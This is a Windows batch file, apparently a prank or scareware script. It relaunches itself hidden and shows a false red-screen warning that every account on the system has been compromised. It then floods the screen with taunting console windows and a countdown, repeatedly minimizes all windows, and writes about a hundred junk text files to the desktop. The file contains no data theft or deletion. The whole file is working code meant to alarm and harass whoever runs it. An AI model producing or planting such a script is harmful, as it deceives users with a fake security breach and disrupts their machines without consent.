@echo off
powershell -command "(New-Object -ComObject Shell.Application).MinimizeAll()"


@echo off
if "%~1"=="-h" goto :hidden
powershell -WindowStyle Hidden -Command "Start-Process '%~f0' -ArgumentList '-h' -WindowStyle Hidden" & exit
:hidden

powershell -Command "$p = Start-Process cmd -ArgumentList '/k color 4 && echo WARNING WARNING. EVERY ACCOUNT YOU HAVE ON THIS SYSTEM HAS BEEN COMPROMISED. TO GET IT BACK. YOU NEED TO... uhhhh close this window.' -PassThru; $p.WaitForExit()"

start cmd /k "color 3 && echo whyd you close it?"
@echo off
timeout /t 3 >nul
start cmd /k "color 4 && echo huh?"
timeout /t 2 >nul
start cmd /k "color 6 && echo you REALLY thought you could get away that easy?"
timeout /t 1 >nul
start cmd /k "color 4 && echo HELL"
timeout /t 1 >nul
start cmd /k "echo NO"
timeout /t 1 >nul
start cmd /k "color 4 && echo 3"
timeout /t 1 >nul
start cmd /k "color 3 && echo 2"
timeout /t 1 >nul
start cmd /k "color 2 && echo 1"
timeout /t 1 >nul

start cmd /k "color 4 && echo BYE BYE BUDDY!"
start cmd /k "color 4 && echo BYE BYE BUDDY!"
start cmd /k "color 4 && echo BYE BYE BUDDY!"
start cmd /k "color 4 && echo BYE BYE BUDDY!"
start cmd /k "color 4 && echo BYE BYE BUDDY!"
start cmd /k "color 4 && echo BYE BYE BUDDY!"
start cmd /k "color 4 && echo BYE BYE BUDDY!"
start cmd /k "color 4 && echo BYE BYE BUDDY!"
start cmd /k "color 4 && echo BYE BYE BUDDY!"
start cmd /k "color 4 && echo BYE BYE BUDDY!"
start cmd /k "color 4 && echo BYE BYE BUDDY!"
start cmd /k "color 4 && echo BYE BYE BUDDY!"
timeout /t 2 >nul
powershell -command "(New-Object -ComObject Shell.Application).MinimizeAll()"
timeout /t 2 >nul
echo BYE BYE BUDDY > %userprofile%\desktop\BY23E345BYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY123456EBYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\121233.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY213E34534BYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY123E345345BYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123BY345345E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY1232EB34534YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123B345345YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY341235345EBYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY3124534EBYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123345345BYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE3312121231234534BYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY34123123543534EBYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY1212312321345634EBYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY45345EBYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY12312323234EBYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY1232312334543EBYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123123BYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE12334234BYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE4234BYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY123E212331234234234BYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY234EBYE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE12323123B423YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY212331234EB234YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123123234B4324YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\123.txt
echo BYE BYE BUDDY > %userprofile%\desktop\3122.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB112323YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB1232312YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE112323123B123123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123BY3123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY12312123EBY123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\B123YEB123123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB213123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123B123213YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB23123Y23123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB23123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE12312BY123123E12.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB1232344YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\31231232.txt
echo BYE BYE BUDDY > %userprofile%\desktop\B123YEB112323YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY123123EB2312YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY123123E123123B123123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY123123EBY3312123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEBY123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123123B123123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123B213123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB12231233213YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB231231231231233Y23123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB23123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB132Y12312123123E12.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB12312323123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB123Y123123E12.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123123B2344YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\32123123.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB112323YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB123212312312YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123123123B123123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB12Y3312123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB2312Y123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB123123123123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123123123123B213123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB12231233213YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE123123BY23123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY123123EB23123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY3123EBY12123123E12.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB12312323123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY123123EBY123123E12.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE3123B2344YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\3312312.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE12312B112323YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB1232312YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE12311232323B123123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEBY1233312123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEBY23123123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB112312323123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB211231233123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB131232231233213YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB23123Y23123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB312323123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB123123Y12123123E12.txt
echo BYE BYE BUDDY > %userprofile%\desktop\1231231.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEBY3123123123E12.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB123122344YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\3123212.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BY31E123B112323YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB1231231232312YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYE112323123B123123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB123123Y3312123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEBY1212312331212313123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB123123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB21231233123YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEB1221233121231233213YE.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEBY1231223123123E.txt
echo BYE BYE BUDDY > %userprofile%\desktop\12.txt
echo BYE BYE BUDDY > %userprofile%\desktop\BYEBY1212311223E12.txt

timeout /t 11 >nul
start cmd /k "color 2 && echo Did you learn your lesson?"
timeout /t 3 >nul
start cmd /k "color 1 && echo you better have."
timeout /t 2 >nul
start cmd /k "echo ill be back..."
timeout /t 1 >nul
start cmd /k "color 4 && echo maybe..."
timeout /t 1 >nul
powershell -command "(New-Object -ComObject Shell.Application).MinimizeAll()"
